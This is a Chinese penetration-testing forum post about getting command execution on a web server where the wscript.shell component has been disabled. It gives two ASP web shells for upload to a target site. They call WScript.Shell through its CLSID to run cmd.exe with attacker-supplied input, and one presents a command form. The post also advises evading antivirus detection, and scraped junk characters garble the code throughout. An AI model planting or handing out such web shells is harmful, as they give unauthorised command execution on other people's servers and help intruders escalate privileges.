找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3102|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。% E/ g3 P2 j' x! A
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    & N1 K6 T5 n0 b) X
  • 要想让运行命令可以试试这种方法,成功率为五五之数。; m& T: u: z( v: U- R
  • 把下面代码复制:9 ]! U  S, _7 {& t; ~
  • <%
    ' n/ t  u! l5 q9 e- H
  • end if7 B$ F9 }$ X) H- |% ?
  • response.write(”")
    0 x& e8 x$ [" o: G8 A+ Y! ~
  • On Error Resume
      E! {6 U3 W& I+ r$ K, G- s# K
  • Next* \+ u4 R0 R% P  B. z( @
  • response.write oScriptlhn.exec(”cmd.exe /c” & 1 P+ G2 a5 m  t' l* A
  • request(”c”)).stdout.readall/ B, z, M( V; _7 Q" }
  • response.write(”")" j) s4 c4 L( w( z/ z
  • response.write(”")
    + {. C; d& i# c5 ^) O( A
  • response.write(”
    : @; N- ?! w7 ^7 x
  • “)* k* n/ S) l& ?( g" @
  • response.write(”")- b; b5 Y2 T) v" w# a' C  h
  • %>) G" q& l3 L7 N
  • 保存为一个asp文件,然后传到网站目录上去
    ; W  n; J- }4 t
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    # N$ D" B' Y4 T# ?4 p6 W
  • 我用此成功运行过cacls命令。
    6 {" h% E1 k3 \$ C0 g: N" p
  • 第二那就是运行时出错,可能限制某些代码执行* p# h( }. R* \- o% }% d
  • 无wscript.shell组件提权又一个方法% m' ^0 x/ V8 F
  • <object runat=server id=oScriptlhn scope=page / I; R4 ?3 i2 X$ c

  • . p0 W- s% q. t6 K7 _- ]
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
    # w9 V* U$ q0 Q' {
  • <%if err then%>
    # d3 \; G( X% u& q& B/ ]
  • <object runat=server id=oScriptlhn scope=page 0 a4 v- \; l) C! t# G
  • - `* [9 B( L% P% V- O( i9 m
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>( X$ H  Q+ U; N7 I7 ]  }
  • <% 9 V5 E/ h4 G0 o$ u; J3 R
  • end if 6 ^1 H9 Q8 z  w/ G# |
  • response.write(”<textarea readonly cols=80
    1 a& E4 K# T2 t9 J$ E- C$ p
  • , w( ?! X% N( ]( ?( G
  • rows=20>”) ' S% _3 H3 ?8 @) P+ M& u
  • On Error Resume Next
    8 e. i: r) A8 s* E) A/ e% X2 J- N
  • response.write & N( ^( V" ]- o5 q: v& y
  • ( o$ a) m3 J' V4 {  ~
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    ; E. c4 \+ U/ ]. m
  • response.write(”</textarea>”) $ h7 H; u; R4 z4 c, P4 V
  • response.write(”<form / O5 A+ |  {6 m% T
  • & K) W' H& ^1 ?- |
  • method=’post’>”)
    $ J$ W/ j8 d0 I; e4 X) `
  • response.write(”<input type=text name=’c'
      N# g! _7 D, _- \( l
  • " Q4 k& |7 Q4 h* D1 s" a% O
  • size=60><br>”)
    6 e" j9 B+ r3 X2 a
  • response.write(”<input type=submit ! y( N3 Y# a: r
  • * p7 Q3 @6 H8 [" z$ _! n
  • value=’执行’></form>”)
    ' b, M) L: n; x$ N' t
  • %>
    9 {6 A$ e( n' x1 P1 ^1 m
  • 保存为ASP,此代码可能被杀,请注意免杀。/ O& P  f+ }- ~) }
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    8 w3 l( |1 f4 P
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表